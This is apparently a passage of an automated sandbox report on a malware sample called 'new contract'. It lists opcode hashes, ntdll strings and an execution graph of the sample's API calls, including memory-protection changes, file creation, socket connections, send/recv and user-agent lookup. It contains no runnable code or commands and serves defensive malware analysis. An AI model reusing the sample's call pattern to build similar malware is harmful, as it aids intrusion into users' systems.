                                                                                                                                                                            • Opcode ID: 04adb0fc40d7ea4debdd3fc52cd9a638a810730bdf506a7a3e6fb1631d7ee54b
                                                                                                                                                                            • Instruction ID: 53c5da4b0dd24fee8639edd387089d6d85ded672696ff297731d250f2e19685b
                                                                                                                                                                            • Opcode Fuzzy Hash: 04adb0fc40d7ea4debdd3fc52cd9a638a810730bdf506a7a3e6fb1631d7ee54b
                                                                                                                                                                            • Instruction Fuzzy Hash: 8C90022120544442D1007958580CA07000997D0205F55D121A5064695EC6358D51A231
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_15f0000_new contract.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 65f277dfc95fe6dbbe16dc410dd7c36d594d10555f314e01bb168c7f674a8045
                                                                                                                                                                            • Instruction ID: e2cf5fc8dbfcd8cc3df00955539fe7d947e6500ddf59e624cfda916b19763376
                                                                                                                                                                            • Opcode Fuzzy Hash: 65f277dfc95fe6dbbe16dc410dd7c36d594d10555f314e01bb168c7f674a8045
                                                                                                                                                                            • Instruction Fuzzy Hash: 7A90023124140402D14175584808607000DA7D0241F95C122A4424654FC6558F56AB61
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_15f0000_new contract.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: fd7135d4b5395fd567ed0d10ca89bfdf709aaf3c15108ead6feacb13967a8a12
                                                                                                                                                                            • Instruction ID: 77a5ef659118583d8e456265b839763a5c3ff70327c21284cabfcb7172037a52
                                                                                                                                                                            • Opcode Fuzzy Hash: fd7135d4b5395fd567ed0d10ca89bfdf709aaf3c15108ead6feacb13967a8a12
                                                                                                                                                                            • Instruction Fuzzy Hash: 0C90023120140842D10075584808B47000997E0301F55C126A4124754EC615CD517621
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_15f0000_new contract.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: cf45d9351f5c3628e64ad7f31a27eded5ba6b3e550f91b90e2c4e89c3f6c7bf8
                                                                                                                                                                            • Instruction ID: 60555c2fe0896c56c24f157ef53b400b4ad825e70ea5e3149bbd0bec0a997e0e
                                                                                                                                                                            • Opcode Fuzzy Hash: cf45d9351f5c3628e64ad7f31a27eded5ba6b3e550f91b90e2c4e89c3f6c7bf8
                                                                                                                                                                            • Instruction Fuzzy Hash: 5790023120140403D1007558590C707000997D0201F55D521A4424658ED6568D516221
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_15f0000_new contract.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 6a7295a7f561ce86f22451e8bd7f70f47d78b753ac7a5f9ab22f0125925f83e5
                                                                                                                                                                            • Instruction ID: 5aa5c98cf53d9c2237c685970c384b0e477ef91ea39f485699e92ed05ec17506
                                                                                                                                                                            • Opcode Fuzzy Hash: 6a7295a7f561ce86f22451e8bd7f70f47d78b753ac7a5f9ab22f0125925f83e5
                                                                                                                                                                            • Instruction Fuzzy Hash: D090022160540402D1407558581C707001997D0201F55D121A4024654EC6598F5567A1
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_15f0000_new contract.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 39a8b49c6abe5535838ed74d46d1e9d8bfd7923a1e5f72060535e641c0ff0e08
                                                                                                                                                                            • Instruction ID: 117049bc8f1ebba074339039371ddece1dd3cdeb116a06562eb4dcd8cfd00a5b
                                                                                                                                                                            • Opcode Fuzzy Hash: 39a8b49c6abe5535838ed74d46d1e9d8bfd7923a1e5f72060535e641c0ff0e08
                                                                                                                                                                            • Instruction Fuzzy Hash: 8790026121140042D10475584808707004997E1201F55C122A6154654DC5298D615225
Memory Dump Source
• Source File: 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_15f0000_new contract.jbxd
Similarity
• API ID: ___swprintf_l
• String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                                                                                                            Strings
                                                                                                                                                                            • ExecuteOptions, xrefs: 016946A0
                                                                                                                                                                            • CLIENT(ntdll): Processing section info %ws..., xrefs: 01694787
                                                                                                                                                                            • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 01694742
                                                                                                                                                                            • Execute=1, xrefs: 01694713
                                                                                                                                                                            • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 01694725
                                                                                                                                                                            • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 01694655
                                                                                                                                                                            • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 016946FC
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_15f0000_new contract.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                                                                                                                            • API String ID: 0-484625025
                                                                                                                                                                            • Opcode ID: 81748505eede7396846bc77844bfd639d9d9dbc2a6e5a79c5f8176d04d01ddf4
                                                                                                                                                                            • Instruction ID: f3310e1e7e8f608aa82388ddabfb9bc1c68b09dff8a519509402f7998e2365d1
                                                                                                                                                                            • Opcode Fuzzy Hash: 81748505eede7396846bc77844bfd639d9d9dbc2a6e5a79c5f8176d04d01ddf4
                                                                                                                                                                            • Instruction Fuzzy Hash: 29510A31600219ABEF11ABA8EC95FBE77ADEF15300F44009DDA05A72C1EB71DE468F65
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_15f0000_new contract.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: d8848935565deeecae3b40dc4d36252ac36c0d5f22eb4f09df1253b8d6557a4c
                                                                                                                                                                            • Instruction ID: 5b06a4760e07902274279e7315a06d81189b615bc4b47b6dd06d35dc34a8fee0
                                                                                                                                                                            • Opcode Fuzzy Hash: d8848935565deeecae3b40dc4d36252ac36c0d5f22eb4f09df1253b8d6557a4c
                                                                                                                                                                            • Instruction Fuzzy Hash: E8021671508342AFD305CF18C894A6BBBE6FFC8704F04892DFA955B264DB31E905CB56
                                                                                                                                                                            APIs
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_15f0000_new contract.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: __aulldvrm
                                                                                                                                                                            • String ID: +$-$0$0
                                                                                                                                                                            • API String ID: 1302938615-699404926
                                                                                                                                                                            • Opcode ID: 67cbaaaa089a52c9565608c335445b38513441175a6f8a80d34fd58ab3f25221
                                                                                                                                                                            • Instruction ID: 7e6c579203cbbf6e7dac689b0676e96cd63d7393096f6ad8fc0b519d328bd646
                                                                                                                                                                            • Opcode Fuzzy Hash: 67cbaaaa089a52c9565608c335445b38513441175a6f8a80d34fd58ab3f25221
                                                                                                                                                                            • Instruction Fuzzy Hash: EF81BC30B0525ADEEF258E68CC917BEBFAAAF45320F18411AD961E7391C73898418B65
                                                                                                                                                                            APIs
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_15f0000_new contract.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: ___swprintf_l
                                                                                                                                                                            • String ID: %%%u$[$]:%u
                                                                                                                                                                            • API String ID: 48624451-2819853543
                                                                                                                                                                            • Opcode ID: ff9d13505efff531388e71bbd723e7cf8e02035a98879faaaac71cf3b2a04125
                                                                                                                                                                            • Instruction ID: 54bae808f98891ac4f5ffdb8972747ea4e9e2e1ef3f8917c43491ddd80d68484
                                                                                                                                                                            • Opcode Fuzzy Hash: ff9d13505efff531388e71bbd723e7cf8e02035a98879faaaac71cf3b2a04125
                                                                                                                                                                            • Instruction Fuzzy Hash: 5721517AE00119ABDB11DE79CC50ABEBBF9EF54651F08411EEA15E3200E730DA158BA1
                                                                                                                                                                            Strings
                                                                                                                                                                            • RTL: Re-Waiting, xrefs: 0169031E
                                                                                                                                                                            • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 016902BD
                                                                                                                                                                            • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 016902E7
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_15f0000_new contract.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                                                                                                                                            • API String ID: 0-2474120054
                                                                                                                                                                            • Opcode ID: ede730f6b424ee3d23fcca0680c96f4c57798f388e9f61b0d04bffd2c63d18da
                                                                                                                                                                            • Instruction ID: 581de54478d748f720d2ed469482b438c5e15d146d55fea0951cd7f1c0f84111
                                                                                                                                                                            • Opcode Fuzzy Hash: ede730f6b424ee3d23fcca0680c96f4c57798f388e9f61b0d04bffd2c63d18da
                                                                                                                                                                            • Instruction Fuzzy Hash: 1EE1AC706087429FEB25CF2CCC84B2ABBE9AB85324F144A9DF5A58B3D1D774D845CB42
                                                                                                                                                                            Strings
                                                                                                                                                                            • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 01697B7F
                                                                                                                                                                            • RTL: Re-Waiting, xrefs: 01697BAC
                                                                                                                                                                            • RTL: Resource at %p, xrefs: 01697B8E
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_15f0000_new contract.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                                                                                            • API String ID: 0-871070163
                                                                                                                                                                            • Opcode ID: 37c71c85a01c7d2c353c794a44ee3679c150a21345beea95a48fbf0f03b8f4c7
                                                                                                                                                                            • Instruction ID: 71dbad531b24956e28806ce13c88416cb21ad28005f482ecf0aee26d1a35915d
                                                                                                                                                                            • Opcode Fuzzy Hash: 37c71c85a01c7d2c353c794a44ee3679c150a21345beea95a48fbf0f03b8f4c7
                                                                                                                                                                            • Instruction Fuzzy Hash: BD41E2317007029FDB25CE2DDC40B6AB7EAEF98710F100A1DE95A9B380DB31E8058F95
                                                                                                                                                                            APIs
                                                                                                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0169728C
                                                                                                                                                                            Strings
                                                                                                                                                                            • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 01697294
                                                                                                                                                                            • RTL: Re-Waiting, xrefs: 016972C1
                                                                                                                                                                            • RTL: Resource at %p, xrefs: 016972A3
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_15f0000_new contract.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                                                                            • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                                                                                            • API String ID: 885266447-605551621
                                                                                                                                                                            • Opcode ID: 54ab18484dc5572d79ebe932786b1ba062e5a24c07cb4bfbb56bc6ea30a41664
                                                                                                                                                                            • Instruction ID: a58019a71875c8df013bb04d3e60e89a85a459002bde078bdf8113180cd98075
                                                                                                                                                                            • Opcode Fuzzy Hash: 54ab18484dc5572d79ebe932786b1ba062e5a24c07cb4bfbb56bc6ea30a41664
                                                                                                                                                                            • Instruction Fuzzy Hash: 7F41FF31611206ABCB21CE69CC81B6ABBAAFF94710F14465DFD55EB380DB20E8528BD5
                                                                                                                                                                            APIs
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_15f0000_new contract.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: ___swprintf_l
                                                                                                                                                                            • String ID: %%%u$]:%u
                                                                                                                                                                            • API String ID: 48624451-3050659472
                                                                                                                                                                            • Opcode ID: b3b59becaf48e5cac8cb5c4e0411b9b652b8c16af2df4b35077ad59d9c95e69d
                                                                                                                                                                            • Instruction ID: a9ca8117f4434ac0ad5d50d9d1f46dd98f7ae43ef23e71c0bd84c65ea67bb70d
                                                                                                                                                                            • Opcode Fuzzy Hash: b3b59becaf48e5cac8cb5c4e0411b9b652b8c16af2df4b35077ad59d9c95e69d
                                                                                                                                                                            • Instruction Fuzzy Hash: DB318172A002199FDB20DF2DCC50BEEB7F9EB44610F45455EED49E3200EF30AA548BA0
                                                                                                                                                                            APIs
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_15f0000_new contract.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: __aulldvrm
                                                                                                                                                                            • String ID: +$-
                                                                                                                                                                            • API String ID: 1302938615-2137968064
                                                                                                                                                                            • Opcode ID: 99ca5d320493ee8ecfac6479c2384e7848b43d072adb6e2058c73728248a7f31
                                                                                                                                                                            • Instruction ID: 2d5b6f16d1d83535f5a6ab1ad42409fe2206da714652ac694a9376635612f62d
                                                                                                                                                                            • Opcode Fuzzy Hash: 99ca5d320493ee8ecfac6479c2384e7848b43d072adb6e2058c73728248a7f31
                                                                                                                                                                            • Instruction Fuzzy Hash: 3891B271E0020A9BEB24DF6DCC80ABEBBBDAF84728F14451AE955E73C0D7349941CB51
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_15f0000_new contract.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: $$@
                                                                                                                                                                            • API String ID: 0-1194432280
                                                                                                                                                                            • Opcode ID: 3211f14d5238881fe04c9304802790714eb01125b0116dcfdd12e549fe93c1a5
                                                                                                                                                                            • Instruction ID: ae7f058f65aced2930810460b94554d605f0b177b4752f2d93c2770d633d53ea
                                                                                                                                                                            • Opcode Fuzzy Hash: 3211f14d5238881fe04c9304802790714eb01125b0116dcfdd12e549fe93c1a5
                                                                                                                                                                            • Instruction Fuzzy Hash: 4C812971D002799BDB31DB54CC54BEABBB8AF48714F1041EAEA19B7280D7709E85CFA4

                                                                                                                                                                            Execution Graph

                                                                                                                                                                            Execution Coverage:2.3%
                                                                                                                                                                            Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                            Signature Coverage:4.7%
                                                                                                                                                                            Total number of Nodes:444
                                                                                                                                                                            Total number of Limit Nodes:16
                                                                                                                                                                            execution_graph 13758 e4e5a4d 13759 e4e5a53 13758->13759 13762 e4d9782 13759->13762 13761 e4e5a6b 13764 e4d978f 13762->13764 13763 e4d97ad 13763->13761 13764->13763 13766 e4de662 13764->13766 13767 e4de66b 13766->13767 13772 e4de7ba 13766->13772 13768 e4d80f2 6 API calls 13767->13768 13767->13772 13769 e4de6ee 13768->13769 13770 e4de750 13769->13770 13771 e4e3f82 6 API calls 13769->13771 13770->13772 13773 e4de83f 13770->13773 13774 e4de791 13770->13774 13771->13770 13772->13763 13773->13772 13775 e4e3f82 6 API calls 13773->13775 13774->13772 13776 e4e3f82 6 API calls 13774->13776 13775->13772 13776->13772 13777 e4e4e0a 13778 e4e3942 13777->13778 13779 e4e4e45 NtProtectVirtualMemory 13778->13779 13780 e4e4e70 13779->13780 13905 e4dd14a 13906 e4dd153 13905->13906 13907 e4dd174 13905->13907 13908 e4df382 ObtainUserAgentString 13906->13908 13909 e4dd1e7 13907->13909 13913 e4d81f2 13907->13913 13910 e4dd16c 13908->13910 13911 e4d80f2 6 API calls 13910->13911 13911->13907 13914 e4d820f 13913->13914 13918 e4d82c9 13913->13918 13915 e4e2f12 7 API calls 13914->13915 13917 e4d8242 13914->13917 13915->13917 13916 e4d8289 13916->13918 13919 e4d80f2 6 API calls 13916->13919 13917->13916 13920 e4d9432 NtCreateFile 13917->13920 13918->13907 13919->13918 13920->13916 13742 e4e3f82 13743 e4e3fb8 13742->13743 13744 e4e05b2 socket 13743->13744 13746 e4e4081 13743->13746 13753 e4e4022 13743->13753 13744->13746 13745 e4e4134 13747 e4e0732 connect 13745->13747 13751 e4e41b2 13745->13751 13745->13753 13746->13745 13748 e4e4117 getaddrinfo 13746->13748 13746->13753 13747->13751 13748->13745 13749 e4e06b2 send 13752 e4e4729 13749->13752 13750 e4e47f4 setsockopt recv 13750->13753 13751->13749 13751->13753 13752->13750 13752->13753 13495 e4d82dd 13499 e4d831a 13495->13499 13496 e4d83fa 13497 e4d8328 SleepEx 13497->13497 
13497->13499 13499->13496 13499->13497 13502 e4e2f12 13499->13502 13511 e4d9432 13499->13511 13521 e4d80f2 13499->13521 13503 e4e2f48 13502->13503 13504 e4e3232 NtCreateFile 13503->13504 13505 e4e30e9 13503->13505 13510 e4e3134 13503->13510 13527 e4e3f82 13503->13527 13504->13503 13506 e4e3125 13505->13506 13539 e4e2842 13505->13539 13547 e4e2922 13506->13547 13510->13499 13512 e4d945b 13511->13512 13520 e4d94c9 13511->13520 13513 e4e3232 NtCreateFile 13512->13513 13512->13520 13514 e4d9496 13513->13514 13519 e4d94c5 13514->13519 13568 e4d9082 13514->13568 13515 e4e3232 NtCreateFile 13515->13520 13517 e4d94b6 13517->13519 13577 e4d8f52 13517->13577 13519->13515 13519->13520 13520->13499 13522 e4d81d3 13521->13522 13523 e4d8109 13521->13523 13522->13499 13582 e4d8012 13523->13582 13525 e4d8113 13525->13522 13526 e4e3f82 6 API calls 13525->13526 13526->13522 13528 e4e3fb8 13527->13528 13531 e4e4081 13528->13531 13538 e4e4022 13528->13538 13555 e4e05b2 13528->13555 13530 e4e4134 13536 e4e41b2 13530->13536 13530->13538 13558 e4e0732 13530->13558 13531->13530 13533 e4e4117 getaddrinfo 13531->13533 13531->13538 13533->13530 13535 e4e47f4 setsockopt recv 13535->13538 13536->13538 13561 e4e06b2 13536->13561 13537 e4e4729 13537->13535 13537->13538 13538->13503 13540 e4e286d 13539->13540 13564 e4e3232 13540->13564 13542 e4e2906 13542->13505 13543 e4e2888 13543->13542 13544 e4e3f82 6 API calls 13543->13544 13545 e4e28c5 13543->13545 13544->13545 13545->13542 13546 e4e3232 NtCreateFile 13545->13546 13546->13542 13548 e4e29c2 13547->13548 13549 e4e3232 NtCreateFile 13548->13549 13553 e4e29d6 13549->13553 13550 e4e2a9f 13550->13510 13551 e4e2a5d 13551->13550 13552 e4e3232 NtCreateFile 13551->13552 13552->13550 13553->13550 13553->13551 13554 e4e3f82 6 API calls 13553->13554 13554->13551 13556 e4e05ec 13555->13556 13557 e4e060a socket 13555->13557 13556->13557 13557->13531 13559 e4e076a 13558->13559 13560 e4e0788 connect 13558->13560 13559->13560 13560->13536 13562 e4e06e7 
13561->13562 13563 e4e0705 send 13561->13563 13562->13563 13563->13537 13566 e4e325c 13564->13566 13567 e4e3334 13564->13567 13565 e4e3410 NtCreateFile 13565->13567 13566->13565 13566->13567 13567->13543 13569 e4d9420 13568->13569 13570 e4d90aa 13568->13570 13569->13517 13570->13569 13571 e4e3232 NtCreateFile 13570->13571 13572 e4d91f9 13571->13572 13573 e4e3232 NtCreateFile 13572->13573 13576 e4d93df 13572->13576 13574 e4d93c9 13573->13574 13575 e4e3232 NtCreateFile 13574->13575 13575->13576 13576->13517 13578 e4d8f70 13577->13578 13579 e4d8f84 13577->13579 13578->13519 13580 e4e3232 NtCreateFile 13579->13580 13581 e4d9046 13580->13581 13581->13519 13584 e4d8031 13582->13584 13583 e4d80cd 13583->13525 13584->13583 13585 e4e3f82 6 API calls 13584->13585 13585->13583 13813 e4dbedd 13815 e4dbf06 13813->13815 13814 e4dbfa4 13815->13814 13816 e4d88f2 NtProtectVirtualMemory 13815->13816 13817 e4dbf9c 13816->13817 13818 e4df382 ObtainUserAgentString 13817->13818 13818->13814 13781 e4e5a1f 13782 e4e5a25 13781->13782 13785 e4d95f2 13782->13785 13784 e4e5a3d 13786 e4d960e 13785->13786 13787 e4d95fb 13785->13787 13786->13784 13787->13786 13788 e4de662 6 API calls 13787->13788 13788->13786 13944 e4dbdd9 13945 e4dbdf0 13944->13945 13946 e4df382 ObtainUserAgentString 13945->13946 13947 e4dbecd 13945->13947 13946->13947 13819 e4ddcd4 13821 e4ddcd8 13819->13821 13820 e4de022 13821->13820 13825 e4dd352 13821->13825 13823 e4ddf0d 13823->13820 13834 e4dd792 13823->13834 13826 e4dd39e 13825->13826 13827 e4dd4ec 13826->13827 13829 e4dd595 13826->13829 13833 e4dd58e 13826->13833 13828 e4e3232 NtCreateFile 13827->13828 13831 e4dd4ff 13828->13831 13830 e4e3232 NtCreateFile 13829->13830 13829->13833 13830->13833 13832 e4e3232 NtCreateFile 13831->13832 13831->13833 13832->13833 13833->13823 13835 e4dd7e0 13834->13835 13836 e4e3232 NtCreateFile 13835->13836 13838 e4dd90c 13836->13838 13837 e4ddaf3 13837->13823 13838->13837 13839 e4dd352 NtCreateFile 13838->13839 13840 e4dd602 NtCreateFile 
13838->13840 13839->13838 13840->13838 13734 e4e4e12 13735 e4e4e45 NtProtectVirtualMemory 13734->13735 13736 e4e3942 13734->13736 13737 e4e4e70 13735->13737 13736->13735 13789 e4d9613 13790 e4d9620 13789->13790 13791 e4d9684 13790->13791 13792 e4e4e12 NtProtectVirtualMemory 13790->13792 13792->13790 13941 e4e072e 13942 e4e0788 connect 13941->13942 13943 e4e076a 13941->13943 13943->13942 13586 e4e4bac 13587 e4e4bb1 13586->13587 13620 e4e4bb6 13587->13620 13621 e4dab72 13587->13621 13589 e4e4c2c 13590 e4e4c85 13589->13590 13592 e4e4c69 13589->13592 13593 e4e4c54 13589->13593 13589->13620 13591 e4e2ab2 NtProtectVirtualMemory 13590->13591 13596 e4e4c8d 13591->13596 13594 e4e4c6e 13592->13594 13595 e4e4c80 13592->13595 13597 e4e2ab2 NtProtectVirtualMemory 13593->13597 13598 e4e2ab2 NtProtectVirtualMemory 13594->13598 13595->13590 13599 e4e4c97 13595->13599 13657 e4dc102 13596->13657 13601 e4e4c5c 13597->13601 13602 e4e4c76 13598->13602 13603 e4e4cbe 13599->13603 13604 e4e4c9c 13599->13604 13643 e4dbee2 13601->13643 13649 e4dbfc2 13602->13649 13607 e4e4cd9 13603->13607 13608 e4e4cc7 13603->13608 13603->13620 13625 e4e2ab2 13604->13625 13611 e4e2ab2 NtProtectVirtualMemory 13607->13611 13607->13620 13610 e4e2ab2 NtProtectVirtualMemory 13608->13610 13613 e4e4ccf 13610->13613 13614 e4e4ce5 13611->13614 13667 e4dc2f2 13613->13667 13685 e4dc712 13614->13685 13623 e4dab93 13621->13623 13622 e4dacce 13622->13589 13623->13622 13624 e4dacb5 CreateMutexExW 13623->13624 13624->13622 13626 e4e2adf 13625->13626 13627 e4e2ebc 13626->13627 13697 e4d88f2 13626->13697 13635 e4dbde2 13627->13635 13629 e4e2e5c 13630 e4d88f2 NtProtectVirtualMemory 13629->13630 13631 e4e2e7c 13630->13631 13632 e4d88f2 NtProtectVirtualMemory 13631->13632 13633 e4e2e9c 13632->13633 13634 e4d88f2 NtProtectVirtualMemory 13633->13634 13634->13627 13637 e4dbdf0 13635->13637 13636 e4dbecd 13639 e4d8412 13636->13639 13637->13636 13722 e4df382 13637->13722 13641 e4d8440 13639->13641 13640 e4d8473 13640->13620 
